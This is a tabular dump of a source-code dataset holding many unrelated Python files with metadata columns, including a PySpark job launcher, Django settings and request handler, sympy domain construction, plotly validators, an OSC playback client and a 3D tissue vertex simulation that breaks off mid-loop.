content
stringlengths 7
928k
| avg_line_length
float64 3.5
33.8k
| max_line_length
int64 6
139k
| alphanum_fraction
float64 0.08
0.96
| licenses
sequence | repository_name
stringlengths 7
104
| path
stringlengths 4
230
| size
int64 7
928k
| lang
stringclasses 1
value |
---|---|---|---|---|---|---|---|---|
import os
import sys
import argparse
from importlib import import_module
from pyspark.sql import SparkSession
spark = SparkSession.builder.getOrCreate()
# Load configuration
parser = argparse.ArgumentParser()
parser.add_argument("job", type=str, nargs='?', default="Job1.MyMethod")
parser.add_argument("slot", type=str, nargs='?', default="2018/11/19")
args = parser.parse_args()
job_module, job_method = args.job.rsplit('.',1)
slot = args.slot
if "local" in spark.sparkContext.master:
dirname = os.path.dirname(__file__)
sys.path.insert(0, (os.path.join(dirname, 'Utils')))
sys.path.insert(0, (os.path.join(dirname, 'Jobs')))
spark.conf.set("ADLS",os.path.join(dirname, 'DataLake'))
else:
spark.sparkContext.addPyFile("dbfs:/MyApplication/Code/scripts.zip")
spark.conf.set("ADLS",'adl://myazuredatalake.azuredatalakestore.net/')
spark.conf.set("dfs.adls.oauth2.access.token.provider.type", "ClientCredential")
spark.conf.set("dfs.adls.oauth2.client.id", dbutils.secrets.get(scope = "SparkADLS - Secrets", key = "clientid"))
spark.conf.set("dfs.adls.oauth2.credential", dbutils.secrets.get(scope = "SparkADLS - Secrets", key = "credential"))
spark.conf.set("dfs.adls.oauth2.refresh.url", "https://login.microsoftonline.com/[tenantid]/oauth2/token")
# Execute Job
mod = import_module(job_module)
met = getattr(mod, job_method)
met(slot) | 38.388889 | 120 | 0.730825 | [
"MIT"
] | DataThirstLtd/databricks.pyspark.application.demo | main.py | 1,382 | Python |
import os
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
SECRET_KEY = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
DEBUG = True
USE_TZ = False
INSTALLED_APPS = [
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
]
MIDDLEWARE = [
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
]
# ROOT_URLCONF = "tests.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
],
},
},
]
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": os.path.join(BASE_DIR, "db.sqlite3"),
}
}
STATIC_URL = "/static/"
| 25.803922 | 70 | 0.648936 | [
"MIT"
] | QueraTeam/django-nextjs | tests/settings.py | 1,316 | Python |
import re
regexp = re.compile(r'''(
[a-zA-Z0-9._%+-]+ # username
@ # @ symbol
(\w)+ # domain name
(\.[a-zA-Z]{2,4}) # dot-something
)''', re.VERBOSE)
| 17.2 | 37 | 0.482558 | [
"MIT"
] | 022ey/Python_Scripts | Email Adresses/email.py | 172 | Python |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Created by TaoYuan on 2018/2/28 0028.
# @Link : http://blog.csdn.net/lftaoyuan
# Github : https://github.com/seeways
import asyncio
import orm
from models import User, Blog, Comment
@asyncio.coroutine
def test(loop):
yield from orm.create_pool(loop=loop, user='root', password='123456', database='awesome')
# taoyuan 123456
u = User(name='TaoYuan', email='taoyuan', passwd='396d447288c288f0ff7ba1fc608600d7e233646d', image='about:blank')
yield from u.save()
loop = asyncio.get_event_loop()
loop.run_until_complete(test(loop))
loop.close()
| 27.954545 | 117 | 0.710569 | [
"Apache-2.0"
] | seeways/awesome-python3-webapp | www/test_sql.py | 615 | Python |
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2020 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
from django.dispatch import receiver
from gcloud.iam_auth.tasks import register_grant_resource_creator_task
from gcloud.core.signals import user_enter
@receiver(user_enter)
def user_enter_handler(username, **kwargs):
register_grant_resource_creator_task.delay(username=username)
| 46.272727 | 115 | 0.806483 | [
"Apache-2.0"
] | sighttviewliu/bk-sops | gcloud/iam_auth/signals/handlers.py | 1,036 | Python |
import _plotly_utils.basevalidators
class TextValidator(_plotly_utils.basevalidators.StringValidator):
def __init__(
self, plotly_name="text", parent_name="heatmap.colorbar.title", **kwargs
):
super(TextValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "colorbars"),
role=kwargs.pop("role", "info"),
**kwargs
)
import _plotly_utils.basevalidators
class SideValidator(_plotly_utils.basevalidators.EnumeratedValidator):
def __init__(
self, plotly_name="side", parent_name="heatmap.colorbar.title", **kwargs
):
super(SideValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "colorbars"),
role=kwargs.pop("role", "style"),
values=kwargs.pop("values", ["right", "top", "bottom"]),
**kwargs
)
import _plotly_utils.basevalidators
class FontValidator(_plotly_utils.basevalidators.CompoundValidator):
def __init__(
self, plotly_name="font", parent_name="heatmap.colorbar.title", **kwargs
):
super(FontValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
data_class_str=kwargs.pop("data_class_str", "Font"),
data_docs=kwargs.pop(
"data_docs",
"""
color
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The Chart Studio Cloud (at
https://chart-studio.plotly.com or on-premise)
generates images on a server, where only a
select number of fonts are installed and
supported. These include "Arial", "Balto",
"Courier New", "Droid Sans",, "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
size
""",
),
**kwargs
)
| 34.863014 | 80 | 0.582711 | [
"MIT",
"BSD-3-Clause"
] | leex5089/leex5089.github.io | venv/Lib/site-packages/plotly/validators/heatmap/colorbar/title/__init__.py | 2,545 | Python |
from __future__ import unicode_literals
import sys
import types
from django import http
from django.core import signals
from django.utils.encoding import force_text
from django.utils.importlib import import_module
from django.utils.log import getLogger
from django.utils import six
logger = getLogger('django.request')
class BaseHandler(object):
# Changes that are always applied to a response (in this order).
response_fixes = [
http.fix_location_header,
http.conditional_content_removal,
http.fix_IE_for_attach,
http.fix_IE_for_vary,
]
def __init__(self):
self._request_middleware = self._view_middleware = self._template_response_middleware = self._response_middleware = self._exception_middleware = None
def load_middleware(self):
"""
Populate middleware lists from settings.MIDDLEWARE_CLASSES.
Must be called after the environment is fixed (see __call__ in subclasses).
"""
from django.conf import settings
from django.core import exceptions
self._view_middleware = []
self._template_response_middleware = []
self._response_middleware = []
self._exception_middleware = []
request_middleware = []
for middleware_path in settings.MIDDLEWARE_CLASSES:
try:
mw_module, mw_classname = middleware_path.rsplit('.', 1)
except ValueError:
raise exceptions.ImproperlyConfigured('%s isn\'t a middleware module' % middleware_path)
try:
mod = import_module(mw_module)
except ImportError as e:
raise exceptions.ImproperlyConfigured('Error importing middleware %s: "%s"' % (mw_module, e))
try:
mw_class = getattr(mod, mw_classname)
except AttributeError:
raise exceptions.ImproperlyConfigured('Middleware module "%s" does not define a "%s" class' % (mw_module, mw_classname))
try:
mw_instance = mw_class()
except exceptions.MiddlewareNotUsed:
continue
if hasattr(mw_instance, 'process_request'):
request_middleware.append(mw_instance.process_request)
if hasattr(mw_instance, 'process_view'):
self._view_middleware.append(mw_instance.process_view)
if hasattr(mw_instance, 'process_template_response'):
self._template_response_middleware.insert(0, mw_instance.process_template_response)
if hasattr(mw_instance, 'process_response'):
self._response_middleware.insert(0, mw_instance.process_response)
if hasattr(mw_instance, 'process_exception'):
self._exception_middleware.insert(0, mw_instance.process_exception)
# We only assign to this when initialization is complete as it is used
# as a flag for initialization being complete.
self._request_middleware = request_middleware
def get_response(self, request):
"Returns an HttpResponse object for the given HttpRequest"
from django.core import exceptions, urlresolvers
from django.conf import settings
try:
# Setup default url resolver for this thread, this code is outside
# the try/except so we don't get a spurious "unbound local
# variable" exception in the event an exception is raised before
# resolver is set
urlconf = settings.ROOT_URLCONF
urlresolvers.set_urlconf(urlconf)
resolver = urlresolvers.RegexURLResolver(r'^/', urlconf)
try:
response = None
# Apply request middleware
for middleware_method in self._request_middleware:
response = middleware_method(request)
if response:
break
if response is None:
if hasattr(request, "urlconf"):
# Reset url resolver with a custom urlconf.
urlconf = request.urlconf
urlresolvers.set_urlconf(urlconf)
resolver = urlresolvers.RegexURLResolver(r'^/', urlconf)
callback, callback_args, callback_kwargs = resolver.resolve(
request.path_info)
# Apply view middleware
for middleware_method in self._view_middleware:
response = middleware_method(request, callback, callback_args, callback_kwargs)
if response:
break
if response is None:
try:
response = callback(request, *callback_args, **callback_kwargs)
except Exception as e:
# If the view raised an exception, run it through exception
# middleware, and if the exception middleware returns a
# response, use that. Otherwise, reraise the exception.
for middleware_method in self._exception_middleware:
response = middleware_method(request, e)
if response:
break
if response is None:
raise
# Complain if the view returned None (a common error).
if response is None:
if isinstance(callback, types.FunctionType): # FBV
view_name = callback.__name__
else: # CBV
view_name = callback.__class__.__name__ + '.__call__'
raise ValueError("The view %s.%s didn't return an HttpResponse object." % (callback.__module__, view_name))
# If the response supports deferred rendering, apply template
# response middleware and the render the response
if hasattr(response, 'render') and callable(response.render):
for middleware_method in self._template_response_middleware:
response = middleware_method(request, response)
response = response.render()
except http.Http404 as e:
logger.warning('Not Found: %s', request.path,
extra={
'status_code': 404,
'request': request
})
if settings.DEBUG:
from django.views import debug
response = debug.technical_404_response(request, e)
else:
try:
callback, param_dict = resolver.resolve404()
response = callback(request, **param_dict)
except:
signals.got_request_exception.send(sender=self.__class__, request=request)
response = self.handle_uncaught_exception(request, resolver, sys.exc_info())
except exceptions.PermissionDenied:
logger.warning(
'Forbidden (Permission denied): %s', request.path,
extra={
'status_code': 403,
'request': request
})
try:
callback, param_dict = resolver.resolve403()
response = callback(request, **param_dict)
except:
signals.got_request_exception.send(
sender=self.__class__, request=request)
response = self.handle_uncaught_exception(request,
resolver, sys.exc_info())
except SystemExit:
# Allow sys.exit() to actually exit. See tickets #1023 and #4701
raise
except: # Handle everything else, including SuspiciousOperation, etc.
# Get the exception info now, in case another exception is thrown later.
signals.got_request_exception.send(sender=self.__class__, request=request)
response = self.handle_uncaught_exception(request, resolver, sys.exc_info())
finally:
# Reset URLconf for this thread on the way out for complete
# isolation of request.urlconf
urlresolvers.set_urlconf(None)
try:
# Apply response middleware, regardless of the response
for middleware_method in self._response_middleware:
response = middleware_method(request, response)
response = self.apply_response_fixes(request, response)
except: # Any exception should be gathered and handled
signals.got_request_exception.send(sender=self.__class__, request=request)
response = self.handle_uncaught_exception(request, resolver, sys.exc_info())
return response
def handle_uncaught_exception(self, request, resolver, exc_info):
"""
Processing for any otherwise uncaught exceptions (those that will
generate HTTP 500 responses). Can be overridden by subclasses who want
customised 500 handling.
Be *very* careful when overriding this because the error could be
caused by anything, so assuming something like the database is always
available would be an error.
"""
from django.conf import settings
if settings.DEBUG_PROPAGATE_EXCEPTIONS:
raise
logger.error('Internal Server Error: %s', request.path,
exc_info=exc_info,
extra={
'status_code': 500,
'request': request
}
)
if settings.DEBUG:
from django.views import debug
return debug.technical_500_response(request, *exc_info)
# If Http500 handler is not installed, re-raise last exception
if resolver.urlconf_module is None:
six.reraise(*exc_info)
# Return an HttpResponse that displays a friendly error message.
callback, param_dict = resolver.resolve500()
return callback(request, **param_dict)
def apply_response_fixes(self, request, response):
"""
Applies each of the functions in self.response_fixes to the request and
response, modifying the response in the process. Returns the new
response.
"""
for func in self.response_fixes:
response = func(request, response)
return response
def get_script_name(environ):
"""
Returns the equivalent of the HTTP request's SCRIPT_NAME environment
variable. If Apache mod_rewrite has been used, returns what would have been
the script name prior to any rewriting (so it's the script name as seen
from the client's perspective), unless the FORCE_SCRIPT_NAME setting is
set (to anything).
"""
from django.conf import settings
if settings.FORCE_SCRIPT_NAME is not None:
return force_text(settings.FORCE_SCRIPT_NAME)
# If Apache's mod_rewrite had a whack at the URL, Apache set either
# SCRIPT_URL or REDIRECT_URL to the full resource URL before applying any
# rewrites. Unfortunately not every Web server (lighttpd!) passes this
# information through all the time, so FORCE_SCRIPT_NAME, above, is still
# needed.
script_url = environ.get('SCRIPT_URL', '')
if not script_url:
script_url = environ.get('REDIRECT_URL', '')
if script_url:
return force_text(script_url[:-len(environ.get('PATH_INFO', ''))])
return force_text(environ.get('SCRIPT_NAME', ''))
| 45.076046 | 157 | 0.59806 | [
"BSD-3-Clause"
] | chalkchisel/django | django/core/handlers/base.py | 11,855 | Python |
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Models package definition."""
from official.nlp.modeling.models.bert_classifier import BertClassifier
from official.nlp.modeling.models.bert_pretrainer import BertPretrainer
from official.nlp.modeling.models.bert_span_labeler import BertSpanLabeler
from official.nlp.modeling.models.bert_token_classifier import BertTokenClassifier
| 51.2 | 82 | 0.741211 | [
"Apache-2.0"
] | Aditya-shahh/models | official/nlp/modeling/models/__init__.py | 1,024 | Python |
"""Tools for constructing domains for expressions. """
from sympy.polys.polyutils import parallel_dict_from_basic
from sympy.polys.polyoptions import build_options
from sympy.polys.domains import ZZ, QQ, RR, EX
from sympy.assumptions import ask, Q
from sympy.core import S, sympify
from sympy.utilities import any
def _construct_simple(coeffs, opt):
"""Handle simple domains, e.g.: ZZ, QQ, RR and algebraic domains. """
result, rationals, reals, algebraics = {}, False, False, False
if opt.extension is True:
is_algebraic = lambda coeff: ask(Q.algebraic(coeff))
else:
is_algebraic = lambda coeff: False
# XXX: add support for a + b*I coefficients
for coeff in coeffs:
if coeff.is_Rational:
if not coeff.is_Integer:
rationals = True
elif coeff.is_Float:
if not algebraics:
reals = True
else:
# there are both reals and algebraics -> EX
return False
elif is_algebraic(coeff):
if not reals:
algebraics = True
else:
# there are both algebraics and reals -> EX
return False
else:
# this is a composite domain, e.g. ZZ[X], EX
return None
if algebraics:
domain, result = _construct_algebraic(coeffs, opt)
else:
if reals:
domain = RR
else:
if opt.field or rationals:
domain = QQ
else:
domain = ZZ
result = []
for coeff in coeffs:
result.append(domain.from_sympy(coeff))
return domain, result
def _construct_algebraic(coeffs, opt):
"""We know that coefficients are algebraic so construct the extension. """
from sympy.polys.numberfields import primitive_element
result, exts = [], set([])
for coeff in coeffs:
if coeff.is_Rational:
coeff = (None, 0, QQ.from_sympy(coeff))
else:
a = coeff.as_coeff_add()[0]
coeff -= a
b = coeff.as_coeff_mul()[0]
coeff /= b
exts.add(coeff)
a = QQ.from_sympy(a)
b = QQ.from_sympy(b)
coeff = (coeff, b, a)
result.append(coeff)
exts = list(exts)
g, span, H = primitive_element(exts, ex=True, polys=True)
root = sum([ s*ext for s, ext in zip(span, exts) ])
domain, g = QQ.algebraic_field((g, root)), g.rep.rep
for i, (coeff, a, b) in enumerate(result):
if coeff is not None:
coeff = a*domain.dtype.from_list(H[exts.index(coeff)], g, QQ) + b
else:
coeff = domain.dtype.from_list([b], g, QQ)
result[i] = coeff
return domain, result
def _construct_composite(coeffs, opt):
"""Handle composite domains, e.g.: ZZ[X], QQ[X], ZZ(X), QQ(X). """
numers, denoms = [], []
for coeff in coeffs:
numer, denom = coeff.as_numer_denom()
numers.append(numer)
denoms.append(denom)
polys, gens = parallel_dict_from_basic(numers + denoms) # XXX: sorting
if any(gen.is_number for gen in gens):
return None # generators are number-like so lets better use EX
n = len(gens)
k = len(polys)//2
numers = polys[:k]
denoms = polys[k:]
if opt.field:
fractions = True
else:
fractions, zeros = False, (0,)*n
for denom in denoms:
if len(denom) > 1 or zeros not in denom:
fractions = True
break
coeffs = set([])
if not fractions:
for numer, denom in zip(numers, denoms):
denom = denom[zeros]
for monom, coeff in numer.iteritems():
coeff /= denom
coeffs.add(coeff)
numer[monom] = coeff
else:
for numer, denom in zip(numers, denoms):
coeffs.update(numer.values())
coeffs.update(denom.values())
rationals, reals = False, False
for coeff in coeffs:
if coeff.is_Rational:
if not coeff.is_Integer:
rationals = True
elif coeff.is_Float:
reals = True
break
if reals:
ground = RR
elif rationals:
ground = QQ
else:
ground = ZZ
result = []
if not fractions:
domain = ground.poly_ring(*gens)
for numer in numers:
for monom, coeff in numer.iteritems():
numer[monom] = ground.from_sympy(coeff)
result.append(domain(numer))
else:
domain = ground.frac_field(*gens)
for numer, denom in zip(numers, denoms):
for monom, coeff in numer.iteritems():
numer[monom] = ground.from_sympy(coeff)
for monom, coeff in denom.iteritems():
denom[monom] = ground.from_sympy(coeff)
result.append(domain((numer, denom)))
return domain, result
def _construct_expression(coeffs, opt):
"""The last resort case, i.e. use the expression domain. """
domain, result = EX, []
for coeff in coeffs:
result.append(domain.from_sympy(coeff))
return domain, result
def construct_domain(obj, **args):
"""Construct a minimal domain for the list of coefficients. """
opt = build_options(args)
if hasattr(obj, '__iter__'):
if isinstance(obj, dict):
monoms, coeffs = zip(*obj.items())
else:
coeffs = obj
else:
coeffs = [obj]
coeffs = map(sympify, coeffs)
result = _construct_simple(coeffs, opt)
if result is not None:
if result is not False:
domain, coeffs = result
else:
domain, coeffs = _construct_expression(coeffs, opt)
else:
if opt.composite:
result = _construct_composite(coeffs, opt)
else:
result = None
if result is not None:
domain, coeffs = result
else:
domain, coeffs = _construct_expression(coeffs, opt)
if hasattr(obj, '__iter__'):
if isinstance(obj, dict):
return domain, dict(zip(monoms, coeffs))
else:
return domain, coeffs
else:
return domain, coeffs[0]
| 26.880342 | 78 | 0.563116 | [
"BSD-3-Clause"
] | jegerjensen/sympy | sympy/polys/constructor.py | 6,290 | Python |
from flask import Flask
app = Flask(__name__)
@app.route("/")
def hello():
return "Hello World!"
| 15.428571 | 26 | 0.62963 | [
"BSD-3-Clause"
] | BlueMoon55/flask_test | tests/test_apps/helloworld/hello.py | 108 | Python |
import logging
import pathlib
from carim.configuration import decorators
from carim.global_resources import auth
from carim.util import file_writing
log = logging.getLogger(__name__)
@decorators.register
@decorators.server
def priority_queue(directory):
users = []
for priority_user in auth.get().get('priority', []):
users.append(priority_user['steam64'])
log.info('adding {} to priority queue'.format(priority_user['name']))
with file_writing.f_open(pathlib.Path(directory, 'priority.txt'), mode='w') as f:
f.writelines(user + ';' for user in users)
| 29.6 | 85 | 0.726351 | [
"Apache-2.0"
] | schana/dayz-server-carim | carim/configuration/universal/config.py | 592 | Python |
from pathlib import Path
from sys import stderr
from click import command, argument
from cv2 import cv2
from life_of_photo.game_of_life import GameOfLife
WINDOW_NAME = "Life of photo"
@command()
@argument("path")
def main(path):
path = Path(path).resolve()
if not path.exists():
print(f"`{path}` doesn't exist", file=stderr)
exit(1)
image = cv2.imread(str(path), cv2.IMREAD_GRAYSCALE)
cv2.namedWindow(WINDOW_NAME, cv2.WINDOW_KEEPRATIO)
cv2.imshow(WINDOW_NAME, image)
simulator = GameOfLife(image)
print("Press `q` to quit")
print("Press `s` to save the current world into an image")
for new_image in simulator:
match chr(cv2.waitKeyEx()):
case "q":
break
case "s":
filename = input("Enter filename: ")
file = path.parent / filename
cv2.imwrite(str(file), new_image)
cv2.imshow(WINDOW_NAME, new_image)
cv2.destroyAllWindows()
| 24.292683 | 62 | 0.629518 | [
"MIT"
] | DAtek/life-of-photo | life_of_photo/gui.py | 996 | Python |
from setuptools import setup
package_name = 'examples_rclpy_minimal_action_server'
setup(
name=package_name,
version='0.10.3',
packages=[package_name],
data_files=[
('share/ament_index/resource_index/packages',
['resource/' + package_name]),
('share/' + package_name, ['package.xml']),
],
install_requires=['setuptools'],
zip_safe=True,
author='Jacob Perron',
author_email='[email protected]',
maintainer='Shane Loretz',
maintainer_email='[email protected]',
keywords=['ROS'],
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python',
'Topic :: Software Development',
],
description='Examples of action servers using rclpy.',
license='Apache License, Version 2.0',
tests_require=['pytest'],
entry_points={
'console_scripts': [
'server = ' + package_name + '.server:main',
'server_defer = ' + package_name + '.server_defer:main',
'server_not_composable = ' + package_name + '.server_not_composable:main',
'server_queue_goals = ' + package_name + '.server_queue_goals:main',
'server_single_goal = ' + package_name + '.server_single_goal:main',
],
},
)
| 33.875 | 86 | 0.628044 | [
"Apache-2.0"
] | Ericsson/ros2-examples | rclpy/actions/minimal_action_server/setup.py | 1,355 | Python |
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from x2paddle.optimizer.pass_ import Pass
from x2paddle.optimizer.fusion.dygraph import TraceFcFuser
from x2paddle.optimizer.pass_manager import pass_register
@pass_register
class TraceFcFusePass(Pass):
name = "trace_fc_fuse_pass"
def __init__(self):
Pass.__init__(self)
def apply(self, graph):
fuser = TraceFcFuser()
fuser.operate(graph, match_kind="topo")
# 用于注册
trace_fc_fuse_pass = TraceFcFusePass() | 32.030303 | 74 | 0.754967 | [
"Apache-2.0"
] | aiyasin/X2Paddle | x2paddle/optimizer/fusion/dygraph/trace_fc_fuse_pass.py | 1,065 | Python |
""" Plays back tiny performances by sending OSC messages to Pure Data """
import struct
import socket
import random
from threading import Timer
DEFAULT_OSC_ADDRESS = "localhost"
DEFAULT_OSC_PORT = 5000
class TouchScreenOscClient(object):
"""A simple OSC client for sending messages recording touch screen performances."""
def __init__(self):
# just set up the socket.
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sock.setblocking(0)
def send_osc_message(self, osc_datagram, address, port):
"""Send OSC message via UDP."""
self.sock.sendto(osc_datagram, (address, port))
def pad_dgram_four_bytes(self, dgram):
"""Pad a datagram up to a multiple of 4 bytes."""
return (dgram + (b'\x00' * (4 - len(dgram) % 4)))
def setSynth(self, instrument="strings", address=DEFAULT_OSC_ADDRESS, port=DEFAULT_OSC_PORT):
"""Sends an OSC message to set the synth instrument."""
dgram = b''
dgram += self.pad_dgram_four_bytes("/inst".encode('utf-8'))
dgram += self.pad_dgram_four_bytes(",s")
dgram += self.pad_dgram_four_bytes(instrument.encode('utf-8'))
self.send_osc_message(dgram, address, port)
def setSynthRandom(self):
"""Choose a random synth for performance playback"""
self.setSynth(random.choice(["chirp", "keys", "drums", "strings"]))
def sendTouch(self, x, y, z, address=DEFAULT_OSC_ADDRESS, port=DEFAULT_OSC_PORT):
"""Sends an OSC message to trigger a touch sound."""
dgram = b''
dgram += self.pad_dgram_four_bytes("/touch".encode('utf-8'))
dgram += self.pad_dgram_four_bytes(",sfsfsf")
dgram += self.pad_dgram_four_bytes("/x".encode('utf-8'))
dgram += struct.pack('>f', x)
dgram += self.pad_dgram_four_bytes("/y".encode('utf-8'))
dgram += struct.pack('>f', y)
dgram += self.pad_dgram_four_bytes("/z".encode('utf-8'))
dgram += struct.pack('>f', z)
self.send_osc_message(dgram, address, port)
def playPerformance(self, perf_df):
"""Schedule performance of a tiny performance dataframe."""
# Dataframe must have abolute time (in seconds) as index, and 'x', 'y', and 'z' as column names.
for row in perf_df.iterrows():
Timer(row[0], self.sendTouch, args=[row[1].x, row[1].y, row[1].z]).start() # used with time in column
| 42.438596 | 114 | 0.647788 | [
"MIT"
] | cpmpercussion/robojam | robojam/tiny_performance_player.py | 2,419 | Python |
import networkx as nx
import numpy as np
import itertools
from scipy.spatial import distance
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
import csv
import pdb
import globals as const
from funcs_orig import *
from math import isclose
from pyqt_viz import edge_viewer
import time
# Constants for simulation
dt = const.dt
#var_dt = True
# dimensions of the cell
l_apical = const.l_apical
l_depth = const.l_depth
# Set the arcs list
inner_arc = const.inner_arc
outer_arc = const.outer_arc
# mechanical parameters
# rest lengths of the passively elastic apical, basal and cell walls
l0_apical = l_apical
l0_basal = l_apical
l0_wall = l_depth
mu_apical = const.mu_apical
mu_basal = const.mu_basal
mu_wall = const.mu_wall
myo_beta = const.myo_beta
eta = const.eta
press_alpha = const.press_alpha
l_mvmt = const.l_mvmt
# initialize the tissue
G, K, centers, num_api_nodes, circum_sorted, belt, triangles = tissue_3d()
pit_centers = const.pit_centers
# Starting from t=0
t = 0
num_inter = 0
blacklist = []
contract = [True for counter in range(0,num_inter)]
#inter_edges = [[301,302],[295,296],[292,293],[298,299],[45,46],[39,40],[272,273],[174,175],[180,181],[276,277],[183,184],[177,178],[112,113],[286,287],[289,290],[115,116],[109,110],[283,284],[280,281],[106,107]]
# Starting from t=? after intercalations occur
#t = 1640
#num_inter = 20
#blacklist = [[301,302],[295,296],[292,293],[298,299],[45,46],[39,40],[272,273],[174,175],[180,181],[276,277],[183,184],[177,178],[112,113],[286,287],[289,290],[115,116],[109,110],[283,284],[280,281],[106,107]]
#contract = [False for counter in range(0,num_inter)]
#G = nx.read_gpickle('/home/cdurney/3d-vertex/concentric/t1640.pickle')
#
#for counter in range(0,num_inter):
# node = blacklist[counter][0]
# neighbor = blacklist[counter][1]
# print(node, neighbor)
# cents = list(set(K.neighbors(node)) & set(K.neighbors(neighbor)))
# ii = list((set(list(K.neighbors(node))) & set(list(centers))) - (set(list(K.neighbors(node))) & set(list(K.neighbors(neighbor)))))[0]
# jj = list((set(list(K.neighbors(neighbor))) & set(list(centers))) - (set(list(K.neighbors(node))) & set(list(K.neighbors(neighbor)))))[0]
# temp1 = list(set(K.neighbors(node)) & set(K.neighbors(cents[0])))
# temp1.remove(neighbor)
# temp2 = list(set(K.neighbors(neighbor)) & set(K.neighbors(cents[1])))
# temp2.remove(node)
# circum_sorted, triangles, K = new_topology(K,[node, neighbor], cents, temp1, temp2, ii, jj, belt, centers, num_api_nodes)
#
# t=initial nx Graph in pickled form for plotting later
print(t)
file_name = 't' + str(int(t))
nx.write_gpickle(G,file_name + '.pickle')
np.save(file_name,circum_sorted)
viewer = edge_viewer(G,attr='myosin')
t_plot=5
t_last=-t_plot
while t <= const.t_final:
if t == const.t_1:
for i in range(0,len(inner_arc)):
G[inner_arc[i-1]][inner_arc[i]]['myosin'] = const.belt_strength
print("Inner arc established")
# update myosin on outer arc
if t == const.t_2:
for i in range(0,len(outer_arc)):
G[outer_arc[i-1]][outer_arc[i]]['myosin'] = const.belt_strength
print("Outer arc established")
# update myosin on belt
if t == const.t_belt:
for i in range(0,len(belt)):
G[belt[i-1]][belt[i]]['myosin'] = const.belt_strength
print("Belt established")
if t-t_last>=t_plot:
viewer(G)
# increment t by dt
# initialize force_dict back to zeros
t = round(t+dt,1)
print(dt, t)
pos = nx.get_node_attributes(G,'pos')
force_dict = {new_list: np.zeros(3,dtype=float) for new_list in G.nodes()}
# pre-calculate magnitude of pressure
# index of list corresponds to index of centers list
PI = np.zeros(len(centers),dtype=float)
# eventually move to classes?
for n in range(0,len(centers)):
# get nodes for volume
pts = get_points(G,centers[n],pos)
# calculate volume
vol = convex_hull_volume_bis(pts)
# calculate pressure
PI[n] = -press_alpha*(vol-const.v_0)
# # Update myosin on a fictitious pit (no resemblance to SG geometry)
# if t < const.t_pit:
# myo = const.pit_strength*t
# for node in pit_centers:
# if node == 0:
# myo = 1.5*myo
# for neighbor in G.neighbors(node):
# G[node][neighbor]['myosin'] = myo
# if t > const.t_intercalate:
# if contract[0] == True:
# G[301][302]['myosin'] = const.belt_strength*(t-const.t_intercalate)
# update myosin on inner arc
for node in G.nodes():
# update force on each node
force = [0.0,0.0,0.0]
# Elastic forces due to the cytoskeleton
for neighbor in G.neighbors(node):
a = pos[node]
b = pos[neighbor]
dist = distance.euclidean(a,b)
direction = unit_vector(a,b)
magnitude = elastic_force(dist, G[node][neighbor]['l_rest'], mu_apical)
force = np.sum([force,magnitude*np.array(direction)],axis=0)
# Force due to myosin
magnitude = myo_beta*G[node][neighbor]['myosin']
force = np.sum([force, magnitude*np.array(direction)],axis=0)
force_dict[node] = np.add(force_dict[node], force)
for center in centers:
index = centers.index(center)
pts = circum_sorted[index]
centroid = np.array([pos[center], pos[center+1000]])
centroid = np.average(centroid,axis=0)
# pressure for:
# apical nodes
for i in range(0,len(circum_sorted[index])):
area, extra = be_area([center,pts[i],pts[i-1]],[center,pts[i],pts[i-1]],pos)
magnitude = PI[index]*area[0]*(1/3)
direction = area[1]/np.linalg.norm(area[1])
force = magnitude*direction
force_dict[center] = np.add(force_dict[center],force)
force_dict[pts[i-1]] = np.add(force_dict[pts[i-1]],force)
